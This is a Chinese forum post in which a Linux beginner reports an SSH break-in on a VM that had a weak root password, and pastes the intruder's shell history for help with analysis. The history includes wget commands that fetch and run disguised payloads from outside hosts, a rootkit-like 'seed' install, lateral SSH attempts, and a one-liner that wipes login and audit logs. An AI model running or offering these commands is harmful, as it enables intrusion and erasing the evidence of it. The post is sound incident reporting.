- 论坛徽章:
- 0
|
昨晚没有关虚拟机 ,里面的linux一直在运行,今天重启系统突然发现我的root密码被改了 !!
于是费了半天劲终于发现,自己的linux被别人ssh以root身份登录以后篡改了我的密码,找到了这段bash的代码 ,好像是在我的系统里进行了一番折腾,情高手帮忙分析一下有没有什么特别的关键的地方被修改了!!
教训,密码太简单了!!123456
w
ps x
uname -a
cat /proc/cpuinfo
cat /etc/hosts
cat /etc/issue
ps -aux
gcc
screen
yum
apt-get
cd /var/spool/at
cd /dev/shm
wget mucul.do.am/doru.jpg
tar -zxvf doru.jpg
rm -rf doru.jpg
cd .sqe
chmod +x seed
cp seed /bin
seed
cd
cd /dev/shm
wget www.mickeyhap.evolink.ro/ssha/sshd.jpg
tar -xzvf sshd.jpg
cd ssh
./inst
ls -a
rm -rf *
ls -a
cd
last
w
ssg 192.168.1.15
ssh 192.168.1.15
ssh 192.168.1.105
netstat -antplu
ps -aux
w
rm -rf .bash_history; rm -rf /var/run/utmp; rm -rf /var/run/wtmp -; rm -rf /var/log/lastlog; rm -rf .bash_history; cd /var/log/; rm -rf wtmp*; rm -rf secure*; rm -rf lastlog*; rm -rf messagess*; touch messagess; touch wtmp; touch secure; touch lastlog; cd /root; rm -rf .bash_history; touch .bash_history
passwd
less /var/log/sys.log |
只知道下载了两个软件 第一个好像是ssh,第二个不太明白 !!!
看了大家这么多的回帖,真的很感动 ,我是linux的初学者装的系统是lfs的是刚刚装好的,基本上没有装任何软件(只有一个ssh),所以很多ip记录啊,抓包的工具都没有装。从命令的历史里面可以看到,那个攻击的人尝试过用apt 和yum来下载那两个包,但是我的系统里面这些工具都是没有的。那个系统我先不用了,自己又在虚拟机上装了一个,等到自己的水平到了以后再去分析一下那两个包到底是什么用的!!
还是要感谢大家的关注!!
那两个包我已经上传了,有兴趣的可以研究一下,第一个包会报有毒!!!
看了31楼的帖子无意中看到“Te descurci sau dai un mail la ”这句, 这个好像是法语或者西班牙语!!!(学过一点点的小语种 !!!!学的不好啊 )
看来应该不是国人 做的!!!
[ 本帖最后由 renfeide112 于 2009-2-23 10:47 编辑 ] |
|
免费注册
发表于 2009-02-20 13:12
发表于 2009-02-20 13:18
